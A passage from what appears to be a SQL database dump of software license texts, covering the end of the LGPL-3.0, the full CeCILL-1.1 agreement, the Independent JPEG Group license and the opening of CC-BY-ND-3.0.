you use option 4d0, the\nInstallation Information must accompany the Minimal Corresponding Source and\nCorresponding Application Code. If you use option 4d1, you must provide the\nInstallation Information in the manner specified by section 6 of the GNU GPL\nfor conveying Corresponding Source.)\n\n 5. Combined Libraries.\n\nYou may place library facilities that are a work based on the Library side\nby side in a single library together with other library facilities that are\nnot Applications and are not covered by this License, and convey such a combined\nlibrary under terms of your choice, if you do both of the following:\n\na) Accompany the combined library with a copy of the same work based on the\nLibrary, uncombined with any other library facilities, conveyed under the\nterms of this License.\n\nb) Give prominent notice with the combined library that part of it is a work\nbased on the Library, and explaining where to find the accompanying uncombined\nform of the same work.\n\n 6. Revised Versions of the GNU Lesser General Public License.\n\nThe Free Software Foundation may publish revised and/or new versions of the\nGNU Lesser General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Library as you\nreceived it specifies that a certain numbered version of the GNU Lesser General\nPublic License \"or any later version\" applies to it, you have the option of\nfollowing the terms and conditions either of that published version or of\nany later version published by the Free Software Foundation. If the Library\nas you received it does not specify a version number of the GNU Lesser General\nPublic License, you may choose any version of the GNU Lesser General Public\nLicense ever published by the Free Software Foundation.\n\nIf the Library as you received it specifies that a proxy can decide whether\nfuture versions of the GNU Lesser General Public License shall apply, that\nproxy\'s public statement of acceptance of any version is permanent authorization\nfor you to choose that version for the Library.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(346,'CECILL-1.1','FREE SOFTWARE LICENSING AGREEMENT CeCILL Notice\n\nThis Agreement is a free software license that is the result of discussions\nbetween its authors in order to ensure compliance with the two main principles\nguiding its drafting:\n\n- firstly, its conformity with French law, both as regards the law of torts\nand intellectual property law, and the protection that it offers to authors\nand the holders of economic rights over software.\n\n- secondly, compliance with the principles for the distribution of free software:\naccess to source codes, extended user-rights.\n\nThe following bodies are the authors of this license CeCILL (Ce : CEA, C :\nCNRS, I : INRIA, LL : Logiciel Libre):\n\n \n\nCommissariat à l\'Energie Atomique - CEA, a public scientific, technical and\nindustrial establishment, having its principal place of business at 31-33\nrue de la Fédération, 75752 PARIS cedex 15, France.\n\n \n\nCentre National de la Recherche Scientifique - CNRS, a public scientific and\ntechnological establishment, having its principal place of business at 3 rue\nMichel-Ange 75794 Paris cedex 16, France.\n\n \n\nInstitut National de Recherche en Informatique et en Automatique - INRIA,\na public scientific and technological establishment, having its principal\nplace of business at Domaine de Voluceau, Rocquencourt, BP 105, 78153 Le Chesnay\ncedex.\n\n \n\n PREAMBLE\n\nThe purpose of this Free Software Licensing Agreement is to grant users the\nright to modify and redistribute the software governed by this license within\nthe framework of an \"open source\" distribution model.\n\nThe exercising of these rights is conditional upon certain obligations for\nusers so as to ensure that this status is retained for subsequent redistribution\noperations.\n\nAs a counterpart to the access to the source code and rights to copy, modify\nand redistribute granted by the license, users are provided only with a limited\nwarranty and the software\'s author, the holder of the economic rights, and\nthe successive licensors only have limited liability.\n\nIn this respect, it is brought to the user\'s attention that the risks associated\nwith loading, using, modifying and/or developing or reproducing the software\nby the user given its nature of Free Software, that may mean that it is complicated\nto manipulate, and that also therefore means that it is reserved for developers\nand experienced professionals having in-depth computer knowledge. Users are\ntherefore encouraged to load and test the Software\'s suitability as regards\ntheir requirements in conditions enabling the security of their systems and/or\ndata to be ensured and, more generally, to use and operate it in the same\nconditions of security. This Agreement may be freely reproduced and published,\nprovided it is not altered, and that no Articles are either added or removed\nherefrom.\n\nThis Agreement may apply to any or all software for which the holder of the\neconomic rights decides to submit the operation thereof to its provisions.\n\n Article 1 - DEFINITIONS\n\nFor the purposes of this Agreement, when the following expressions commence\nwith a capital letter, they shall have the following meaning:\n\n \n\nAgreement: means this Licensing Agreement, and any or all of its subsequent\nversions.\n\n \n\nSoftware: means the software in its Object Code and/or Source Code form and,\nwhere applicable, its documentation, \"as is\" at the time when the Licensee\naccepts the Agreement.\n\n \n\nInitial Software: means the Software in its Source Code and/or Object Code\nform and, where applicable, its documentation, \"as is\" at the time when it\nis distributed for the first time under the terms and conditions of the Agreement.\n\n \n\nModified Software: means the Software modified by at least one Contribution.\n\n \n\nSource Code: means all the Software\'s instructions and program lines to which\naccess is required so as to modify the Software.\n\n \n\nObject Code: means the binary files originating from the compilation of the\nSource Code.\n\n \n\nHolder: means the holder of the economic rights over the Initial Software.\n\n \n\n Licensee(s): mean(s) the Software user(s) having accepted the Agreement.\n\n \n\n Contributor: means a Licensee having made at least one Contribution.\n\n \n\nLicensor: means the Holder, or any or all other individual or legal entity,\nthat distributes the Software under the Agreement.\n\n \n\nContributions: mean any or all modifications, corrections, translations, adaptations\nand/or new functionalities integrated into the Software by any or all Contributor,\nand the Static Modules.\n\n \n\nModule: means a set of sources files including their documentation that, once\ncompiled in executable form, enables supplementary functionalities or services\nto be developed in addition to those offered by the Software.\n\n \n\nDynamic Module: means any or all module, created by the Contributor, that\nis independent of the Software, so that this module and the Software are in\ntwo different executable forms that are run in separate address spaces, with\none calling the other when they are run.\n\n \n\nStatic Module: means any or all module, created by the Contributor and connected\nto the Software by a static link that makes their object codes interdependent.\nThis module and the Software to which it is connected, are combined in a single\nexecutable.\n\n \n\n Parties: mean both the Licensee and the Licensor.\n\n These expressions may be used both in singular and plural form.\n\n Article 2 - PURPOSE\n\nThe purpose of the Agreement is to enable the Licensor to grant the Licensee\na free, non-exclusive, transferable and worldwide License for the Software\nas set forth in Article 5 hereinafter for the whole term of protection of\nthe rights over said Software.\n\n Article 3 - ACCEPTANCE\n\n3.1. The Licensee shall be deemed as having accepted the terms and conditions\nof this Agreement by the occurrence of the first of the following events:\n\n(i) loading the Software by any or all means, notably, by downloading from\na remote server, or by loading from a physical medium;\n\n(ii) the first time the Licensee exercises any of the rights granted hereunder.\n\n3.2. One copy of the Agreement, containing a notice relating to the specific\nnature of the Software, to the limited warranty, and to the limitation to\nuse by experienced users has been provided to the Licensee prior to its acceptance\nas set forth in Article 3.1 hereinabove, and the Licensee hereby acknowledges\nthat it is aware thereof.\n\n Article 4 - EFFECTIVE DATE AND TERM\n\n 4.1. EFFECTIVE DATE\n\nThe Agreement shall become effective on the date when it is accepted by the\nLicensee as set forth in Article 3.1.\n\n 4.2. TERM\n\nThe Agreement shall remain in force during the whole legal term of protection\nof the economic rights over the Software.\n\nArticle 5 - SCOPE OF THE RIGHTS GRANTED ---------------------------------------\n\nThe Licensor hereby grants to the Licensee, that accepts such, the following\nrights as regards the Software for any or all use, and for the term of the\nAgreement, on the basis of the terms and conditions set forth hereinafter.\n\nOtherwise, the Licensor grants to the Licensee free of charge exploitation\nrights on the patents he holds on whole or part of the inventions implemented\nin the Software.\n\n 5.1. RIGHTS OF USE\n\nThe Licensee is authorized to use the Software, unrestrictedly, as regards\nthe fields of application, with it being hereinafter specified that this relates\nto:\n\n1. permanent or temporary reproduction of all or part of the Software by any\nor all means and in any or all form.\n\n2. loading, displaying, running, or storing the Software on any or all medium.\n\n3. entitlement to observe, study or test the operation thereof so as to establish\nthe ideas and principles that form the basis for any or all constituent elements\nof said Software. This shall apply when the Licensee carries out any or all\nloading, displaying, running, transmission or storage operation as regards\nthe Software, that it is entitled to carry out hereunder.\n\n 5.2. ENTITLEMENT TO MAKE CONTRIBUTIONS\n\nThe right to make Contributions includes the right to translate, adapt, arrange,\nor make any or all modification to the Software, and the right to reproduce\nthe resulting Software.\n\nThe Licensee is authorized to make any or all Contribution to the Software\nprovided that it explicitly mentions its name as the author of said Contribution\nand the date of the development thereof.\n\n 5.3. DISTRIBUTION AND PUBLICATION RIGHTS\n\nIn particular, the right of distribution and publication includes the right\nto transmit and communicate the Software to the general public on any or all\nmedium, and by any or all means, and the right to market, either in consideration\nof a fee, or free of charge, a copy or copies of the Software by means of\nany or all process. The Licensee is further authorized to redistribute copies\nof the modified or unmodified Software to third parties according to the terms\nand conditions set forth hereinafter.\n\n 5.3.1. REDISTRIBUTION OF SOFTWARE WITHOUT MODIFICATION\n\nThe Licensee is authorized to redistribute true copies of the Software in\nSource Code or Object Code form, provided that said redistribution complies\nwith all the provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the Software\'s Object Code is redistributed,\nthe Licensee allows future Licensees unhindered access to the Software\'s full\nSource Code by providing them with the terms and conditions for access thereto,\nit being understood that the additional cost of acquiring the Source Code\nshall not exceed the cost of transferring the data.\n\n 5.3.2. REDISTRIBUTION OF MODIFIED SOFTWARE\n\nWhen the Licensee makes a Contribution to the Software, the terms and conditions\nfor the redistribution of the Modified Software shall then be subject to all\nthe provisions hereof.\n\nThe Licensee is authorized to redistribute the Modified Software, in Source\nCode or Object Code form, provided that said redistribution complies with\nall the provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the Modified Software\'s Object Code is redistributed,\nthe Licensee allows future Licensees unhindered access to the Modified Software\'s\nfull Source Code by providing them with the terms and conditions for access\nthereto, it being understood that the additional cost of acquiring the Source\nCode shall not exceed the cost of transferring the data.\n\n 5.3.3. REDISTRIBUTION OF DYNAMIC MODULES\n\nWhen the Licensee has developed a Dynamic Module, the terms and conditions\nhereof do not apply to said Dynamic Module, that may be distributed under\na separate Licensing Agreement.\n\n 5.3.4. COMPATIBILITY WITH THE GPL LICENSE\n\nIn the event that the Modified or unmodified Software is included in a code\nthat is subject to the provisions of the GPL License, the Licensee is authorized\nto redistribute the whole under the GPL License.\n\nIn the event that the Modified Software includes a code that is subject to\nthe provisions of the GPL License, the Licensee is authorized to redistribute\nthe Modified Software under the GPL License.\n\n Article 6 - INTELLECTUAL PROPERTY\n\n 6.1. OVER THE INITIAL SOFTWARE\n\nThe Holder owns the economic rights over the Initial Software. Any or all\nuse of the Initial Software is subject to compliance with the terms and conditions\nunder which the Holder has elected to distribute its work and no one shall\nbe entitled to and it shall have sole entitlement to modify the terms and\nconditions for the distribution of said Initial Software.\n\nThe Holder undertakes to maintain the distribution of the Initial Software\nunder the conditions of the Agreement, for the duration set forth in article\n4.2..\n\n 6.2. OVER THE CONTRIBUTIONS\n\nThe intellectual property rights over the Contributions belong to the holder\nof the economic rights as designated by effective legislation.\n\n 6.3. OVER THE DYNAMIC MODULES\n\nThe Licensee having developed a Dynamic Module is the holder of the intellectual\nproperty rights over said Dynamic Module and is free to choose the agreement\nthat shall govern its distribution.\n\n 6.4. JOINT PROVISIONS\n\n \n\n 6.4.1. The Licensee expressly undertakes:\n\n1. not to remove, or modify, in any or all manner, the intellectual property\nnotices affixed to the Software;\n\n2. to reproduce said notices, in an identical manner, in the copies of the\nSoftware.\n\n \n\n6.4.2. The Licensee undertakes not to directly or indirectly infringe the\nintellectual property rights of the Holder and/or Contributors and to take,\nwhere applicable, vis-à-vis its staff, any or all measures required to ensure\nrespect for said intellectual property rights of the Holder and/or Contributors.\n\n Article 7 - RELATED SERVICES\n\n7.1. Under no circumstances shall the Agreement oblige the Licensor to provide\ntechnical assistance or maintenance services for the Software.\n\nHowever, the Licensor is entitled to offer this type of service. The terms\nand conditions of such technical assistance, and/or such maintenance, shall\nthen be set forth in a separate instrument. Only the Licensor offering said\nmaintenance and/or technical assistance services shall incur liability therefor.\n\n7.2. Similarly, any or all Licensor shall be entitled to offer to its Licensees,\nunder its own responsibility, a warranty, that shall only be binding upon\nitself, for the redistribution of the Software and/or the Modified Software,\nunder terms and conditions that it shall decide upon itself. Said warranty,\nand the financial terms and conditions of its application, shall be subject\nto a separate instrument executed between the Licensor and the Licensee.\n\n Article 8 - LIABILITY\n\n8.1. Subject to the provisions of Article 8.2, should the Licensor fail to\nfulfill all or part of its obligations hereunder, the Licensee shall be entitled\nto claim compensation for the direct loss suffered as a result of a fault\non the part of the Licensor, subject to providing evidence of it.\n\n8.2. The Licensor\'s liability is limited to the commitments made under this\nLicensing Agreement and shall not be incurred as a result , in particular:\n(i) of loss due the Licensee\'s total or partial failure to fulfill its obligations,\n(ii) direct or consequential loss due to the Software\'s use or performance\nthat is suffered by the Licensee, when the latter is a professional using\nsaid Software for professional purposes and (iii) consequential loss due to\nthe Software\'s use or performance. The Parties expressly agree that any or\nall pecuniary or business loss (i.e. loss of data, loss of profits, operating\nloss, loss of customers or orders, opportunity cost, any disturbance to business\nactivities) or any or all legal proceedings instituted against the Licensee\nby a third party, shall constitute consequential loss and shall not provide\nentitlement to any or all compensation from the Licensor.\n\n Article 9 - WARRANTY\n\n9.1. The Licensee acknowledges that the current situation as regards scientific\nand technical know-how at the time when the Software was distributed did not\nenable all possible uses to be tested and verified, nor for the presence of\nany or all faults to be detected. In this respect, the Licensee\'s attention\nhas been drawn to the risks associated with loading, using, modifying and/or\ndeveloping and reproducing the Software that are reserved for experienced\nusers.\n\nThe Licensee shall be responsible for verifying, by any or all means, the\nproduct\'s suitability for its requirements, its due and proper functioning,\nand for ensuring that it shall not cause damage to either persons or property.\n\n9.2. The Licensor hereby represents, in good faith, that it is entitled to\ngrant all the rights on the Software (including in particular the rights set\nforth in Article 5 hereof over the Software).\n\n9.3. The Licensee acknowledges that the Software is supplied \"as is\" by the\nLicensor without any or all other express or tacit warranty, other than that\nprovided for in Article 9.2 and, in particular, without any or all warranty\nas to its market value, its secured, innovative or relevant nature.\n\nSpecifically, the Licensor does not warrant that the Software is free from\nany or all error, that it shall operate continuously, that it shall be compatible\nwith the Licensee\'s own equipment and its software configuration, nor that\nit shall meet the Licensee\'s requirements.\n\n9.4. The Licensor does not either expressly or tacitly warrant that the Software\ndoes not infringe any or all third party intellectual right relating to a\npatent, software or to any or all other property right. Moreover, the Licensor\nshall not hold the Licensee harmless against any or all proceedings for infringement\nthat may be instituted in respect of the use, modification and redistribution\nof the Software. Nevertheless, should such proceedings be instituted against\nthe Licensee, the Licensor shall provide it with technical and legal assistance\nfor its defense. Such technical and legal assistance shall be decided upon\non a case-by-case basis between the relevant Licensor and the Licensee pursuant\nto a memorandum of understanding. The Licensor disclaims any or all liability\nas regards the Licensee\'s use of the Software\'s name. No warranty shall be\nprovided as regards the existence of prior rights over the name of the Software\nand as regards the existence of a trademark.\n\n Article 10 - TERMINATION\n\n10.1. In the event of a breach by the Licensee of its obligations hereunder,\nthe Licensor may automatically terminate this Agreement thirty (30) days after\nnotice has been sent to the Licensee and has remained ineffective.\n\n10.2. The Licensee whose Agreement is terminated shall no longer be authorized\nto use, modify or distribute the Software. However, any or all licenses that\nit may have granted prior to termination of the Agreement shall remain valid\nsubject to their having been granted in compliance with the terms and conditions\nhereof.\n\n Article 11 - MISCELLANEOUS PROVISIONS\n\n 11.1. EXCUSABLE EVENTS\n\nNeither Party shall be liable for any or all delay, or failure to perform\nthe Agreement, that may be attributable to an event of force majeure, an act\nof God or an outside cause, such as, notably, defective functioning, or interruptions\naffecting the electricity or telecommunications networks, blocking of the\nnetwork following a virus attack, the intervention of the government authorities,\nnatural disasters, water damage, earthquakes, fire, explosions, strikes and\nlabor unrest, war, etc.\n\n11.2. The fact that either Party may fail, on one or several occasions, to\ninvoke one or several of the provisions hereof, shall under no circumstances\nbe interpreted as being a waiver by the interested Party of its entitlement\nto invoke said provision(s) subsequently.\n\n11.3. The Agreement cancels and replaces any or all previous agreement, whether\nwritten or oral, between the Parties and having the same purpose, and constitutes\nthe entirety of the agreement between said Parties concerning said purpose.\nNo supplement or modification to the terms and conditions hereof shall be\neffective as regards the Parties unless it is made in writing and signed by\ntheir duly authorized representatives.\n\n11.4. In the event that one or several of the provisions hereof were to conflict\nwith a current or future applicable act or legislative text, said act or legislative\ntext shall take precedence, and the Parties shall make the necessary amendments\nso as to be in compliance with said act or legislative text. All the other\nprovisions shall remain effective. Similarly, the fact that a provision of\nthe Agreement may be null and void, for any reason whatsoever, shall not cause\nthe Agreement as a whole to be null and void.\n\n 11.5. LANGUAGE\n\nThe Agreement is drafted in both French and English. In the event of a conflict\nas regards construction, the French version shall be deemed authentic.\n\n Article 12 - NEW VERSIONS OF THE AGREEMENT\n\n12.1. Any or all person is authorized to duplicate and distribute copies of\nthis Agreement.\n\n12.2. So as to ensure coherence, the wording of this Agreement is protected\nand may only be modified by the authors of the License, that reserve the right\nto periodically publish updates or new versions of the Agreement, each with\na separate number. These subsequent versions may address new issues encountered\nby Free Software.\n\n12.3. Any or all Software distributed under a given version of the Agreement\nmay only be subsequently distributed under the same version of the Agreement,\nor a subsequent version, subject to the provisions of article 5.3.4.\n\n Article 13 - GOVERNING LAW AND JURISDICTION\n\n13.1. The Agreement is governed by French law. The Parties agree to endeavor\nto settle the disagreements or disputes that may arise during the performance\nof the Agreement out-of-court.\n\n13.2. In the absence of an out-of-court settlement within two (2) months as\nfrom their occurrence, and unless emergency proceedings are necessary, the\ndisagreements or disputes shall be referred to the Paris Courts having jurisdiction,\nby the first Party to take action.\n\nVersion 1.1 of 10/26/2004\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(347,'IJG','Independent JPEG Group License LEGAL ISSUES\n\nIn plain English:\n\n1. We don\'t promise that this software works. (But if you find any bugs, please\nlet us know!)\n\n2. You can use this software for whatever you want. You don\'t have to pay\nus.\n\n3. You may not pretend that you wrote this software. If you use it in a program,\nyou must acknowledge somewhere in your documentation that you\'ve used the\nIJG code.\n\nIn legalese:\n\nThe authors make NO WARRANTY or representation, either express or implied,\nwith respect to this software, its quality, accuracy, merchantability, or\nfitness for a particular purpose. This software is provided \"AS IS\", and you,\nits user, assume the entire risk as to its quality and accuracy.\n\nThis software is copyright (C) 1991-1998, Thomas G. Lane. All Rights Reserved\nexcept as specified below.\n\nPermission is hereby granted to use, copy, modify, and distribute this software\n(or portions thereof) for any purpose, without fee, subject to these conditions:\n\n(1) If any part of the source code for this software is distributed, then\nthis README file must be included, with this copyright and no-warranty notice\nunaltered; and any additions, deletions, or changes to the original files\nmust be clearly indicated in accompanying documentation.\n\n(2) If only executable code is distributed, then the accompanying documentation\nmust state that \"this software is based in part on the work of the Independent\nJPEG Group\".\n\n(3) Permission for use of this software is granted only if the user accepts\nfull responsibility for any undesirable consequences; the authors accept NO\nLIABILITY for damages of any kind.\n\nThese conditions apply to any software derived from or based on the IJG code,\nnot just to the unmodified library. If you use our work, you ought to acknowledge\nus.\n\nPermission is NOT granted for the use of any IJG author\'s name or company\nname in advertising or publicity relating to this software or products derived\nfrom it. This software may be referred to only as \"the Independent JPEG Group\'s\nsoftware\".\n\nWe specifically permit and encourage the use of this software as the basis\nof commercial products, provided that all warranty or liability claims are\nassumed by the product vendor.\n\nansi2knr.c is included in this distribution by permission of L. Peter Deutsch,\nsole proprietor of its copyright holder, Aladdin Enterprises of Menlo Park,\nCA. ansi2knr.c is NOT covered by the above copyright and conditions, but instead\nby the usual distribution terms of the Free Software Foundation; principally,\nthat you must include source code if you redistribute it. (See the file ansi2knr.c\nfor full details.) However, since ansi2knr.c is not needed as part of any\nprogram generated from the IJG code, this does not limit you more than the\nforegoing paragraphs do.\n\nThe Unix configuration script \"configure\" was produced with GNU Autoconf.\nIt is copyright by the Free Software Foundation but is freely distributable.\nThe same holds for its supporting scripts (config.guess, config.sub, ltconfig,\nltmain.sh). Another support script, install-sh, is copyright by M.I.T. but\nis also freely distributable.\n\nIt appears that the arithmetic coding option of the JPEG spec is covered by\npatents owned by IBM, AT&T, and Mitsubishi. Hence arithmetic coding cannot\nlegally be used without obtaining one or more licenses. For this reason, support\nfor arithmetic coding has been removed from the free JPEG software. (Since\narithmetic coding provides only a marginal gain over the unpatented Huffman\nmode, it is unlikely that very many implementations will support it.) So far\nas we are aware, there are no patent restrictions on the remaining code.\n\nThe IJG distribution formerly included code to read and write GIF files. To\navoid entanglement with the Unisys LZW patent, GIF reading support has been\nremoved altogether, and the GIF writer has been simplified to produce \"uncompressed\nGIFs\". This technique does not use the LZW algorithm; the resulting GIF files\nare larger than usual, but are readable by all standard GIF decoders.\n\nWe are required to state that\n\n\"The Graphics Interchange Format(c) is the Copyright property of CompuServe\nIncorporated. GIF(sm) is a Service Mark property of CompuServe Incorporated.\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(348,'CC-BY-ND-3.0','Creative Commons Attribution-NoDerivs 3.0 Unported CREATIVE COMMONS CORPORATION\nIS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS\nLICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED\nTO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION\nOF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Adaptation\" means a work based upon the Work, or upon the Work and other\npre-existing works, such as a translation, adaptation, derivative work, arrangement\nof music or other alterations of a literary or artistic work, or phonogram\nor performance and includes cinematographic adaptations or any other form\nin which the Work may be recast, transformed, or adapted including in any\nform recognizably derived from the original, except that a work that constitutes\na Collection will not be considered an Adaptation for the purpose of this\nLicense. For the avoidance of doubt, where the Work is a musical work, performance\nor phonogram, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered an Adaptation for the purpose of this\nLicense.\n\nb. \"Collection\" means a collection of literary or artistic works, such as\nencyclopedias and anthologies, or performances, phonograms or broadcasts,\nor other works or subject matter other than works listed in Section 1(f) below,\nwhich, by reason of the selection and arrangement of their contents, constitute\nintellectual creations, in which the Work is included in its entirety in unmodified\nform along with one or more other contributions, each constituting separate\nand independent works in themselves, which together are assembled into a collective\nwhole. A work that constitutes a Collection will not be considered an Adaptation\n(as defined above) for the purposes of this License.\n\nc. \"Distribute\" means to make available to the public the original and copies\nof the Work through sale or other transfer of ownership.\n\nd. \"Licensor\" means the individual, individuals, entity or entities that offer(s)\nthe Work under the terms of this License.\n\ne. \"Original Author\" means, in the case of a literary or artistic work, the\nindividual, individuals, entity or entities who created the Work or if no\nindividual or entity can be identified, the publisher; and in addition (i)\nin the case of a performance the actors, singers, musicians, dancers, and\nother persons who act, sing, deliver, declaim, play in, interpret or otherwise\nperform literary or artistic works or expressions of folklore; (ii) in the\ncase of a phonogram the producer being the person or legal entity who first\nfixes the sounds of a performance or other sounds; and, (iii) in the case\nof broadcasts, the organization that transmits the broadcast.\n\nf. \"Work\" means the literary and/or artistic work offered under the terms\nof this License including without limitation any production in the literary,\nscientific and artistic domain, whatever may be the mode or form of its expression\nincluding digital form, such as a book, pamphlet and other writing; a lecture,\naddress, sermon or other work of the same nature; a dramatic or dramatico-musical\nwork; a choreographic work or entertainment in dumb show; a musical composition\nwith or without words; a cinematographic work to which are assimilated works\nexpressed by a process analogous to cinematography; a work of drawing, painting,\narchitecture, sculpture, engraving or lithography; a photographic work to\nwhich are assimilated works expressed by a process analogous to photography;\na work of applied art; an illustration, map, plan, sketch or three-dimensional\nwork relative to geography, topography, architecture or science; a performance;\na broadcast; a phonogram; a compilation of data to the extent it is protected\nas a copyrightable work; or a work performed by a variety or circus performer\nto the extent it is not otherwise considered a literary or artistic work.\n\ng. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\nh. \"Publicly Perform\" means to perform public recitations of the Work and\nto communicate to the public those public recitations, by any means or process,\nincluding by wire or wireless means or public digital performances; to make\navailable to the public Works in such a way that members of the public may\naccess these Works from a place and at a place individually chosen by them;\nto perform the Work to the public by any means or process and the communication\nto the public of the performances of the Work, including by public digital\nperformance; to broadcast and rebroadcast the Work by any means including\nsigns, sounds or images.\n\ni. \"Reproduce\" means to make copies of the Work by any means including without\nlimitation by sound or visual recordings and the right of fixation and reproducing\nfixations of the Work, including storage of a protected performance or phonogram\nin digital form or other electronic medium.\n\n2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit,\nor restrict any uses free from copyright or rights arising from limitations\nor exceptions that are provided for in connection with the copyright protection\nunder copyright law or other applicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to Reproduce the Work, to incorporate the Work into one or more Collections,\nand to Reproduce the Work as incorporated in the Collections; and,\n\nb. to Distribute and Publicly Perform the Work including as incorporated in\nCollections.\n\n c. For the avoidance of doubt:\n\ni. Non-waivable Compulsory License Schemes. In those jurisdictions in which\nthe right to collect royalties through any statutory or compulsory licensing\nscheme cannot be waived, the Licensor reserves the exclusive right to collect\nsuch royalties for any exercise by You of the rights granted under this License;\n\nii. Waivable Compulsory License Schemes. In those jurisdictions in which the\nright to collect royalties through any statutory or compulsory licensing scheme\ncan be waived, the Licensor waives the exclusive right to collect such royalties\nfor any exercise by You of the rights granted under this License; and,\n\niii. Voluntary License Schemes. The Licensor waives the right to collect royalties,\nwhether individually or, in the event that the Licensor is a member of a collecting\nsociety that administers voluntary licensing schemes, via that society, from\nany exercise by You of the rights granted under this License.\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats,\nbut otherwise you have no rights to make Adaptations. Subject to Section 8(f),\nall rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may Distribute or Publicly Perform the Work only under the terms of\nthis License. You must include a copy of, or the Uniform Resource Identifier\n(URI) for, this License with every copy of the Work You Distribute or Publicly\nPerform. You may not offer or impose any terms on the Work that restrict the\nterms of this License or the ability of the recipient of the Work to exercise\nthe rights granted to that recipient under the terms of the License. You may\nnot sublicense the Work. You must keep intact all notices that refer to this\nLicense and to the disclaimer of warranties with every copy of the Work You\nDistribute or Publicly Perform. When You Distribute or Publicly Perform the\nWork, You may not impose any effective technological measures on the Work\nthat restrict the ability of a recipient of the Work from You to exercise\nthe rights granted to that recipient under the terms of the License. This\nSection 4(a) applies to the Work as incorporated in a Collection, but this\ndoes not require the Collection apart from the Work itself to be made subject\nto the terms of this License. If You create a Collection, upon notice from\nany Licensor You must, to the extent practicable, remove from the Collection\nany credit as required by Section 4(b), as requested.\n\nb. If You Distribute, or Publicly Perform the Work or Collections, You must,\nunless a request has been made pursuant to Section 4(a), keep intact all copyright\nnotices for the Work and provide, reasonable to the medium or means You are\nutilizing: (i) the name of the Original Author (or pseudonym, if applicable)\nif supplied, and/or if the Original Author and/or Licensor designate another\nparty or parties (e.g., a sponsor institute, publishing entity, journal) for\nattribution (\"Attribution Parties\") in Licensor\'s copyright notice, terms\nof service or by other reasonable means, the name of such party or parties;\n(ii) the title of the Work if supplied; (iii) to the extent reasonably practicable,\nthe URI, if any, that Licensor specifies to be associated with the Work, unless\nsuch URI does not refer to the copyright notice or licensing information for\nthe Work. The credit required by this Section 4(b) may be implemented in any\nreasonable manner; provided, however, that in the case of a Collection, at\na minimum such credit will appear, if a credit for all contributing authors\nof the Collection appears, then as part of these credits and in a manner at\nleast as prominent as the credits for the other contributing authors. For\nthe avoidance of doubt, You may only use the credit required by this Section\nfor the purpose of attribution in the manner set out above and, by exercising\nYour rights under this License, You may not implicitly or explicitly assert\nor imply any connection with, sponsorship or endorsement by the Original Author,\nLicensor and/or Attribution Parties, as appropriate, of You or Your use of\nthe Work, without the separate, express prior written permission of the Original\nAuthor, Licensor and/or Attribution Parties.\n\nc. Except as otherwise agreed in writing by the Licensor or as may be otherwise\npermitted by applicable law, if You Reproduce, Distribute or Publicly Perform\nthe Work either by itself or as part of any Collections, You must not distort,\nmutilate, modify or take other derogatory action in relation to the Work which\nwould be prejudicial to the Original Author\'s honor or reputation.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF 